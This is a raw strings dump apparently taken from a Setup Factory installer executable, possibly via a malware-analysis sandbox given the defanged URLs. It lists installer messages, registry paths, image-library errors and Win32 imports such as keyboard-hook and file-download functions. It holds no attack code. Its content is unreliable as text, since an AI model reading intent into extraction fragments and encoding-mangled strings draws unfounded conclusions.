Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
Windows 7
Windows Server 2008
Windows Vista
Windows Server 2003
Windows XP
CPasswordData
-- Defined in _SUF70_Global_Functions.lua
number e_ErrorCode, string e_ErrorMsgID
%TempFolder%\%ProductName% Setup Log.txt
%StartupFolder%
%StartFolder%
%StartProgramsFolder%
ÞsktopFolder%
%s\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%CommonFilesFolder%\Microsoft Shared\DAO
Software\Microsoft\Shared Tools\DAO350.dll
Software\Microsoft\Shared Tools\DAO360.dll
ÚOPath%
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
%SourceFolder%
%SystemDrive%
_WindowsFolder
%WindowsFolder%
%SystemFolder%
%CommonFilesFolder%
%CommonFilesFolder64%
%CommonProgramW6432%
%CommonDocumentsFolder%
%StartupFolderCommon%
%StartProgramsFolderCommon%
%StartFolderCommon%
%FontsFolder%
ÞsktopFolderCommon%
;?;?.lua
UninstallSupportFiles
CPRegKey
Run extra uninstall script: %d
Original: %d
Calculated: %d
Unable to open archive file: %d
lua5.1.dll
%SourceDrive%
%SourceFilename%
\irsetup.dat
{D387204B-8FB9-6A21-15FA-0CD14BF40EA9}
Support file added to uninstall list:
Registry key added to uninstall list:
Removed! %d
IDispatch error #%d
Error 0xx: %s
Register font: %s, %s
%sbk%d
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
Remove uninstall support file:
MSG_NO
MSG_YES_TOALL
MSG_YES
MSG_UNINSTALL_OK_REMOVE
MSG_UNINSTALL_NO_APP_USE
MSG_UNINSTALL_REMOVE_SHARED
Decrement shared file count: %s (New count = %d)
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
: %s (#%d)
Global include script: %s
RegisterTypeLib: %s
RegisterTypeLib failure reason: %s
RegisterTypeLib: %s - %s
Register COM file: %s
Register COM failure reason: %s
Register COM file: %s - System Error # %u
Register COM file on reboot: %s
regsvr32.exe /s %s
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Increment usage count: %s
Increment usage count: %s (New count = %d)
%s\%s
%s (%d)
\irsetup.skin
local e_Stage = %d;local e_CurrentItemText=[==[%s]==];local e_CurrentItemPct=%d;local e_StagePct=%d;
MSG_SYSREQ_WARN
MSG_NOTICE
MSG_SYSREQ_ABORT
%s: %s
MSG_SYSREQ_USERPERMISSION
MSG_SYSREQ_SYSTEMADMIN
MSG_SYSREQ_COLORDEPTH
MSG_BITSPERPIXEL
MSG_SYSREQ_SCREENHEIGHT
%s: %d
MSG_SYSREQ_SCREENWIDTH
%s: %d %s
MSG_SYSREQ_RAM
MSG_SIZE_MEGABYTES
Operating System
MSG_SYSREQ_OS
MSG_OS_PART_ORNEWER
MSG_OS_PART_NOSERVPACK
MSG_OS_PART_SERVPACK
MSG_OS_PART_SE
MSG_OS_PART_C
MSG_OS_PART_B
MSG_OS_PART_A
MSG_OS_ALL
MSG_OS_NONE
MSG_OS_WSRV10
MSG_OS_W10
MSG_OS_WSRV2012_R2
MSG_OS_W8_1
MSG_OS_WSRV2012
MSG_OS_W8
MSG_OS_WSRV2008_R2
MSG_OS_W7
MSG_OS_WSRV2008
MSG_OS_WVISTA
MSG_OS_WSRV2003
MSG_OS_WXP
MSG_OS_UNKNOWN
MSG_SYSREQ_NOTMET
%s %d %s
MSG_EXP_USESLEFT
MSG_EXP_USESLEFT2
%s %I64d %s
MSG_EXP_DAYSLEFT
MSG_EXP_DAYSLEFT2
Software\Microsoft\Windows\CurrentVersion\I652R9823\
MSG_EXP_CONTACT_START
Run project event: %s
local e_ErrorCode=%d; local e_ErrorMsgID = "%s"
Start project event: %s
MSG_UNINSTALLFILE_NOREMOVE
MSG_UNINSTALLFILE_INUSE
%s (%s: %u)
\WININIT.INI
MSG_FILE_EXISTS_INUSE
MSG_FILE_EXISTS_RETRY
MSG_FILE_EXISTS_ANY
MSG_FILE_EXISTS_NEWER
MSG_FILE_OVERWRITE_CONFIRM
%s\%s.lnk
%s (Return code: %d)
Product: %s, version %s
MSG_SEEKING
%s (%d):
Arc: %s
FN: %s
%s (#%d)
MSG_SKIPPING
MSG_INSTALLING
MSG_PROG_UNINSTALL_CREATECONTROLFILE
ERR_CREATEUNINSTALL_OPEN_EXE_READ
ERR_CREATEUNINSTALL_OPEN_EXE_WRITE
Overwrite uninstall executable:
Existing uninstall executable is newer. Will not overwrite.
Compared uninstall file versions. New: %s Old: %s Result: %d
Uninstall executable already exists: %s
MSG_PROG_UNINSTALL_CREATEEXE
@MSG_PROG_UNINSTALL_CREATEDATFILE
MSG_PROG_UNINSTALL_CREATEFOLDER
"/U:%s"
MSG_PROG_UNINSTALL_CREATESC
Create uninstall CP entry key
ERR_CREATEUNINSTALL_CREATEREGKEY
"%s",%d
Uninstall CP entry: URLUpdateInfo =
URLUpdateInfo
Uninstall CP entry: URLInfoAbout =
URLInfoAbout
"%s" "/U:%s"
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
MSG_PROG_UNINSTALL_CREATECPENTRY
MSG_PROG_UNINSTALL_COPYSUPPORTFILES
MSG_PROG_UNINSTALL_COPYPLUGINS
%s %s
MSG_REQUIRED_DRIVE
MSG_AVAILABLE_DRIVE
Dependency Detection Passed
MSG_PROG_CHECKING_DRIVESPACE
MSG_PROG_CHECKING_FILES
%A, %B %d, %Y
[%s] %s
%m/%d/%Y %H:%M:%S
MsgFile
ERR_MSI_PATCH_REMOVAL_UNSUPPORTED
ERR_MSI_PATCH_PACKAGE_UNSUPPORTED
ERR_MSI_INSTALL_PLATFORM_UNSUPPORTED
ERR_MSI_UNSUPPORTED_TYPE
ERR_MSI_INSTALL_LANGUAGE_UNSUPPORTED
ERR_SERVER_FILE_DOWNLOAD_SET_PROXY_PASSWORD
ERR_SERVER_FILE_DOWNLOAD_OPEN_FTP_FILE
ERR_SERVER_FILE_DOWNLOAD_OPEN_HTTP_FILE
ERR_ODBC_INVALID_KEYWORD_VALUE
ERR_WEB_503
ERR_WEB_500
ERR_WEB_404
ERR_WEB_403
ERR_WEB_400
ERR_WEB_SET_PROXY_PASSWORD
ERR_WEB_SET_PROXY_USERNAME
ERR_WEB_WRITE_MEMORY
ERR_WEB_FTP_FILE_OPEN
ERR_WEB_USER_ABORT
ERR_WEB_FILE_WRITE
ERR_WEB_DOWNLOAD_FILE_ERROR
ERR_WEB_INVALID_HTTP_RESPONSE
ERR_WEB_DESTINATION_FILE_OPEN
ERR_WEB_SEND_REQUEST
ERR_WEB_OPEN_REQUEST
ERR_WEB_CREATE_HTTP_CONNECTION
ERR_WEB_CREATE_INTERNET_SESSION
ERR_REG_GET_SUB_KEY_NAME
ERR_REG_NON_EXISTANT_SUB_KEY
ERR_REG_DELETE_KEY
ERR_REG_CREATE_KEY
ERR_FILE_EXECUTION_FAILED_ELEVATION
ERR_KEY_RUN_ON_REBOOT_FAILED
ERR_USER_ABORTED_OPERATION
ERR_NON_EXISTANT_VIEWER_EXE
ERR_FILE_EXECUTION_FAILED
ERR_SPECIFIED_EXE_FILE_INVALID
MSG_SUCCESS
Language set: Primary = %d, Secondary = %d
%CompanyURL%
%CompanyName%
UxTheme.dll
%Copyright% %CompanyName%. All rights reserved. %CompanyURL%
%TempFolder%\%ProductName% Uninstall Log.txt
%CompanyName% Support Department
%AppFolder%\uninstall.exe
uninstall.xml
CWebBrowser2
Confirm Operation
KERNEL32.DLL
PSAPI.DLL
Kernel32.dll
WS2_32.DLL
Copying "%s"
"%s" %s
%d.%d.%d.%d
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\PrivateBuild
Sfc.dll
.bak%d
Windows ME
Windows 98
Windows 95
Windows 2000
Windows NT 4
Windows NT 3
%s\shell\open\command
NUL=%s
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Fonts
***!!!***@@
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\%s.url
%s\%s.pif
srclient.dll
%s_%d
%s\_ir_tmpfnt_%d
/\:*?"<>|
%%x
d:d
WinINet.dll
Could not create Internet session: %u
Error downloading file: %u
Error writing the destination file: %d-%u
Could not create HTTP connection: %u
Could not create HTTP connection
Incorrect HTTP status returned by server: %d
Send request failed: %u
Content-Type: application/x-www-form-urlencoded
Could not open HTTP file: %s
PTF://
hXXps://
hXXp://
%s; DIRECT
jsproxy.dll
DetectAutoProxyUrl
wininet.dll
Could not HTTP file: %u
MSG_STATUS_HANDLE_CREATED
MSG_STATUS_HANDLE_CLOSING
MSG_STATUS_REQUEST_COMPLETE
MSG_REDIRECTING
MSG_CONNECTION_CLOSED
MSG_RESOLVING_HOST_NAME
MSG_HOST_NAME_RESOLVED
MSG_CONNECTING_TO_SERVER
MSG_CONNECTED_TO_SERVER
MSG_CLOSING_CONNECTION
MSG: %d
TRACE: LastError = %d ("%s")
Script: %s, %s
Script: %s, Line %d
All Files (*.*)|*.*|
PasswordInput
MSG_MOVING
MSG_COPYING
MSG_FROM
MSG_TO
MSG_DELETING
MSG_SEARCHING
\StringFileInfo\xx\SpecialBuild
\StringFileInfo\xx\OriginalFilename
\StringFileInfo\xx\Comments
\StringFileInfo\xx\LegalTrademarks
\StringFileInfo\xx\LegalCopyright
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\InternalName
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\CompanyName
ErrorMsg
%Y-%m-%dT%H:%M:%S
MSG_INSTALL_DO_YOU_WANT_OVERWRITE
MSG_INSTALL_ALWAYS_ASK_OVERWRITE_MSG
MSG_INSTALL_FILE_OLDER_MSG
OpenURL
\msiexec.exe
RunMsiexec
SQLInstallerError
SQLRemoveDriverManager
odbccp32.dll
SQLConfigDataSource
SQLInstallDriverEx
SQLInstallDriverManager
SQLRemoveDriver
\Kernel32.dll
GetKeyNames
DoesKeyExist
DeleteKey
CreateKey
ShortcutKey
keycode
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
MSG_SIZE_BYTES
P?MSG_SIZE_KILOBYTES
>MSG_SIZE_GIGABYTES
xxxxxx
%s-%s-%s
%s/%s/%s
%s:%s:%s
%d:%s:%s AM
%d:%s:%s PM
MSG_REBOOT_FAILED
WININET.DLL
PPassword
Password
%s %s %s %s (%0.2f %s)
%0.1f %s/%0.1f %s
%I64u %s/%I64u %s
MSG_KB_PER_SEC
MSG_ESTIMATED_TIME_LEFT
MSG_SAVING
MSG_DOWNLOADING
%s %s %s %s
MSG_QUERYING_INTERNET
MSG_READING
GetHTTPErrorInfo
%s > %s
number e_CtrlID, number e_MsgID, table e_Details
Removed: %s
local e_CtrlID=%d; local e_MsgID=%d;
Button%d
Check%d
ComboBox%d
Edit%d
Space available on selected drive: %SpaceAvailable%
Space required: %SpaceRequired%
Error: The specified file: '%s' could not be found.
Error: The specified file: '%s' could not be opened.
Error: The specified file: '%s' is too large to read.
Error: The specified file: '%s' could not be read.
Application.Exit();
Screen.Next();
Screen.Back();
Radio%d
Total space required: %SpaceRequired%
IDS_CTRL_CHECK_BOX_d
IDS_CTRL_BUTTON_d
IDS_CTRL_STATICTEXT_LABEL_d
IDS_CTRL_COMBOBOX_d_DEFAULT
IDS_CTRL_EDIT_d
IDS_CTRL_RADIO_BUTTON_d
IDS_CTRL_LISTBOX_d
IDS_CTRL_SCROLLTEXT_BODY_d
IDS_CTRL_PROGRESS_BAR_d
IDS_CTRL_GROUP_BOX_d
IDS_CTRL_SELECT_PACKAGE_TREE_d
IDS_CTRL_BILLBOARD_d
CTRL_CHECK_BOX_d
CTRL_BUTTON_d
CTRL_STATICTEXT_LABEL_d
CTRL_COMBOBOX_d
CTRL_EDIT_d
CTRL_RADIO_BUTTON_d
CTRL_LIST_BOX_d
CTRL_SCROLLTEXT_BODY_d
CTRL_PROGRESS_BAR_d
CTRL_GROUP_BOX_d
CTRL_SELECT_PACKAGE_TREE_d
CTRL_BILLBOARD_d
IDS_CTRL_COMBOBOX_d_ITEMS
IDS_CTRL_SCROLLTEXT_FILE_d
WebWindow
IDS_CTRL_CATEGORY_NAME_d_%.3d
IDS_CTRL_CATEGORY_DESCRIPTION_d_%.3d
hXXp://VVV.indigorose.com/route.php?pid=suf9buy
[email protected]
.tiff
.jpeg
.wbmp
CNotSupportedException
user32.dll
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
CHttpConnection
CHttpFile
HTTP/1.0
msctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
mfcm100.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Shell32.dll
%s:%x:%x:%x:%x
RegDeleteKeyExA
lXXxXXXXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
ole32.dll
MFCLink_UrlPrefix
MFCLink_Url
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
&%d %s
Hex={X,X,X}
ShowCmd
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sPane-%d%x
%sPane-%d
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%c%d%c%s
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
windows
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
IS 5.0.2.4
Error %d in %s (%s)
Error %d in %s (%s) [%s]
C.o.p.y.r.i.g.h.t...2.0.1.0.
ISLib PNG Error : %s
1.2.22
ISLib JPG Error : %s
DIBToHBITMAP error: GetLastError = %d
read %d. layersLen %d
Reading PCD sub-image #%d (%d x %d)
.cals
Keywords
SetWinMetaFileBits failed GetLastError = %d
GeoKeyDirectory
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
No space %s
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF or MDI file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Integer overflow in %s
LIBTIFF, Version 3.9.1
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
1.2.3
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
Found bad IPTC data resource (len exceeds block end). ID=%d
ExifInteroperabilityOffset
InteroperabilityVersion
InteroperabilityIndex
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
%s: wrong data type %d for "%s"; tag ignored
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
deflate 1.2.3 Copyright 1995-2003 Jean-loup Gailly
%ld%c
%s compression support is not configured
inflate 1.2.3 Copyright 1995-2005 Mark Adler
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
?PixarLog compression can't handle bits depth/data format combination (depth: %d)
%d bit input not supported in PixarLog
PixarLogDecode: unsupported bits/sample: %d
%s: stride %d is not a multiple of sample count, %d, data truncated.
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
PixarLog compression can't handle %d bit linear encodings
A%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
%s: No space for Group 3/4 reference line
@ Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
WindowsForms
NTDLL.DLL
COMCTL32.DLL
USER32.DLL
MSCTF.DLL
GDI32.DLL
SHLWAPI.DLL
UXTHEME.DLL
API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0.DLL
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
%[^,], %ld, %s
User32.dll
msimg32.dll
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
1.2.40
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
WININET.dll
?#%X.y
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
.?AVCCmdTarget@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCISImageEx@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDVCRect@@AAV3@@@
.?AVCMainWindowSettings@@
.?AVCMD5@@
.?AVCPasswordData@@
.?AVCRTSessionVarMgr@@
.?AVCScreenCrtrMeasure@@
.?AVCWebBrowser2@@
.PAVCInternetException@@
.PAVCResourceException@@
.?AVCScreenCtrlMsg@@
.?AVCScreenCtrlMsgDetail@@
.PAVCThreadException@IR@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCOleDispatchException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegDeleteKeyA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteExA
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
MapVirtualKeyExA
GetKeyboardState
GetKeyboardLayout
MapVirtualKeyA
GetKeyNameTextA
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetKeyState
ExitWindowsEx
EnumWindows
MsgWaitForMultipleObjects
GetAsyncKeyState
|5#" " " 
# # #""%"$
^)1-"*"<.
2;%SK
%.Fh3>$]R
]<%XZ
WEBI
]>2?>2/"
H%FZW
|@@@@8>-
\ ,%X
[9<;.MK31?MM&
!3-%#;3&1
##0#3131%& 
.QICN,1#-#5<## @I3>##Jl;>C3I=I6lIC6&-4-350T-3]
$&%f#F>#
:0@033*00
$,0($,$4
(,,4,4,$
0488<<<( 0
.text
`.rdata
@.data
.rsrc
@.reloc
accKeyboardShortcut
hhctrl.ocx
VWININET.DLL
dwmapi.dll
xUxTheme.dll
yDWrite.dll
D2D1.dll
SHELL32.DLL
